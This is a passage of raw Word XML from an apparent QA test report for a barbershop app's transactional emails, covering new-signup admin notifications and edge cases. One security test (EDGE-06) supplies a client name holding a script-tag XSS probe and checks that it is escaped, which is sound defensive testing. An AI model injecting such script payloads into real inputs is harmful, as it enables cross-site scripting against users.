              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1D11E48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52786A6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detail row shows signup email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7096D21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650608E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46F988F" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2374263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NSA-13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="39EAC60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EBCB1C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detail row shows shop name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="27FDA71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4900F2C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6D6264B" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="083C89F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NSA-14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1586287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56CB459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detail row shows signup timestamp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4F3A261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tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04D552C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11E79C84" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6087B7F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NSA-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="51A9DC8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7C7DA6F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includes “VIEW SUPABASE DASHBOARD” CTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7B7B4AF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Present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="43F7BBA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B92E2BD" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D6C1E0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NSA-16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37CA28C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tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="618C03F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HTML rendered in standard </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>emailShell</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> wrapper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5381A74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Confirmed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2FFB024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D0111F5" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5D11460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NSA-17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7AB92EF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content</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2D4AEC0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Plain text includes all 4 data fields</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2E4DBAF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4 present</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="770A30D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5F5F44BA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D1ABA1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NSA-18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55621F9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live</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="306364F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Email delivered via Resend API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="702406A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Resend ID: </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>058ce440</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3121239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bl>
    <w:p w14:paraId="64DC6A7C"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Subject line format:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>New signup: Daniel Osei — Crown Cuts Barbershop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EE0BDB" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="49EDE3D9">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2549D795" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="tc-edge-edge-cases-security"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>TC-EDGE — Edge Cases &amp; Security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7"/>
        <w:gridCol w:w="1857"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
        <w:gridCol w:w="1858"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="7422AF27"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="1CE02EE5"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TC-ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5F73D0C5"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="791CFDA3"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Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="683B61E1"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Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="4926E4C1"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25EBE45C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="71A672B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EDGE-01</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="198BA09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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="1C9C66B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Booking confirmation renders with all optional fields null (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>shopAddress</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>shopPhone</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>depositAmount</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bookingPageUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="371C8A17"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Renders without error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5CEA5C8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27FFA58C" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65A45DE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EDGE-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6DB482B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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4107D86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Booking reminder renders with all optional fields null</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6507037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Renders without error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="591C268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80EE199" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="157EB9C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EDGE-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="39AA2A4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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="502428C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Booking cancellation renders without </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bookingPageUrl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (no CTA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="163E1FD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Renders without error, no CTA shown</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6858F72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31F73DC7" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2DF16E2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EDGE-04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="221C3B5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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="301C682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Low stock subject uses singular “item” when exactly 1 item in list</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4CD4257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Subject reads “1 item”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="01AF024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F7B4A29" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7509C8E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lastRenderedPageBreak/>
              <w:t>EDGE-05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="136DD71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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="77E20AD6"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Staff invitation with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ownerName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: null</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> — no literal “null” string in HTML output</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="35C6A06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No “null” text found</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="2003DE7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0461303D" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="47D8DE3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EDGE-06</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="65D0A25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security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0FF1BC34" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>clientName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> containing </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&lt;script&gt;alert(</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>1)&lt;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/script&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> — raw tag must not appear in HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="47CDD86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 xml:space="preserve">Escaped to </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>lt;script</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&amp;gt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1584" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
